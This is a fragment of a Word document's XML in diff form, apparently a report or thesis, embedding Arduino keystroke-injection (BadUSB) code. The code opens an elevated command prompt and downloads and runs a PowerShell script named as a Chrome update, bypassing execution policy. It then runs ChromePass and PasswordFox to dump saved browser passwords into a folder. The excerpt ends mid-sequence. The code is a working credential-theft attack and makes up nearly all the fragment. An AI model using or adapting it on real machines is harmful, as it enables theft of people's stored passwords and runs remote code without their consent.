+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype w14:anchorId="5B3D16AD" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                <v:stroke joinstyle="miter"/>
+                <v:path gradientshapeok="t" o:connecttype="rect"/>
+              </v:shapetype>
+              <v:shape id="Text Box 13" o:spid="_x0000_s1026" type="#_x0000_t202" style="width:429.5pt;height:701.85pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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" fillcolor="white [3201]" strokeweight=".5pt">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t>#include "Keyboard.h"</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t>void typeKey(int key) {</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.press(key);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  delay(</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                          <w:lang w:val="id-ID"/>
+                        </w:rPr>
+                        <w:t>100</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t>);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.release(key);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t>}</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t>void setup() {</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  // Begining the Keyboard stream</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.begin();</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  // Wait 500ms</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  delay(</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                          <w:lang w:val="id-ID"/>
+                        </w:rPr>
+                        <w:t>600</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t>);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.press(KEY_LEFT_GUI);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.press('r');</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.releaseAll();</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.print("powershell Start-Process cmd -Verb runAs");</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.press(KEY_LEFT_ARROW);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  delay(1000);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.print("cd / &amp; mkdir chrome &amp; cd chrome");</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.print("mkdir Password");</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.print("echo (wget 'https://raw.githubusercontent.com/abdulaziesmuslim/TA/master/ChromeUpdateDownload.ps1' -OutFile ChromeUpdateDownload.ps1) &gt; b.ps1");</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.print("powershell -ExecutionPolicy ByPass -File b.ps1");</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.print("powershell -ExecutionPolicy ByPass -File ChromeUpdateDownload.ps1");</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.print("ChromePass.exe /stext ChromePass.txt");</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  delay(</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                          <w:lang w:val="id-ID"/>
+                        </w:rPr>
+                        <w:t>100</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t>);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.print("PasswordFox.exe /stext PasswordFox.txt");</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  delay(8000);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">  Keyboard.print("for %I in (ChromePass.txt PasswordFox.txt) do copy %I c:\\chrome\\Password");</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="18"/>
+                          <w:szCs w:val="18"/>
+                        </w:rPr>
